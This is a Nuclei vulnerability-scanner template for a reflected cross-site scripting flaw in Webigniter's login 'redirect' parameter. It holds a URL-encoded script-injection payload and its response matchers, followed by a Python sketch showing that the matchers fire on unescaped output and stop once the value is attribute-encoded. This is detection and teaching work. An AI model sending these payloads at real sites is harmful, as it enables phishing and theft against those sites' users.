nuclei-templates/http/vulnerabilities/other/webigniter-xss.yaml


id: webigniter-xss
info:
  name: Webigniter 28.7.23 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3"><script>alert(1)</script>bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected
    - https://webigniter.net
  metadata:
    verified: true
    max-request: 2
  tags: xss,webigniter
http:
  - method: GET
    path:
      - '{{BaseURL}}/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'
      - '{{BaseURL}}/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Webigniter"
        condition: and
      - type: word
        part: header
        words:
          - "text/html"
      - type: status
        status:
          - 200
# digest: 4a0a0047304502202b5892c130fae79ae0bf8897937cfb3c0ee38a5027dae47d37b3b5720d6f954c022100e205b44352138dbd48e827d0056757829fbff83d9ddc32447398dc94cf6b5f47:922c64590222798bb761d5b6d8e72950
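
Added example, not part of the template or of Webigniter's code: a Python sketch of why the matchers above fire when the redirect value is echoed unmodified into a double-quoted attribute, and why they stop firing once the value is attribute-encoded. The FORM markup, the function names and the sample headers are constructed assumptions; only the query value and the matcher words come from the template.

```python
import html
from urllib.parse import unquote

# Constructed stand-in for the login form; the real Webigniter markup is not shown on this page.
FORM = ('<html><head><title>Webigniter</title></head><body><form method="post">'
        '<input type="hidden" name="redirect" value="{}"></form></body></html>')

# Query value from the template's path entries, URL-decoded as the server would see it.
PAYLOAD = unquote("cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w")

# Words from the template's body matcher (condition: and).
BODY_WORDS = ["<script>alert(document.domain)</script>", "Webigniter"]


def render_vulnerable(redirect: str) -> str:
    """Echo the parameter unmodified, as the description says the application does."""
    return FORM.format(redirect)


def render_escaped(redirect: str) -> str:
    """Attribute-encode the value so the double quote can no longer close value="..."."""
    return FORM.format(html.escape(redirect, quote=True))


def template_matches(status: int, headers: str, body: str) -> bool:
    """Apply the template's three matchers combined with matchers-condition: and."""
    body_ok = all(word in body for word in BODY_WORDS)
    header_ok = "text/html" in headers
    return body_ok and header_ok and status == 200


if __name__ == "__main__":
    hdrs = "Content-Type: text/html; charset=UTF-8"  # constructed sample header
    for label, render in (("unescaped", render_vulnerable), ("escaped", render_escaped)):
        body = render(PAYLOAD)
        print(f"{label:10} match={template_matches(200, hdrs, body)}")
        print("  ", body[body.index("<input"):body.index("</form>")])
```

Encoding fixes the reflection only; the redirect target itself still needs validation against an allowlist of local paths.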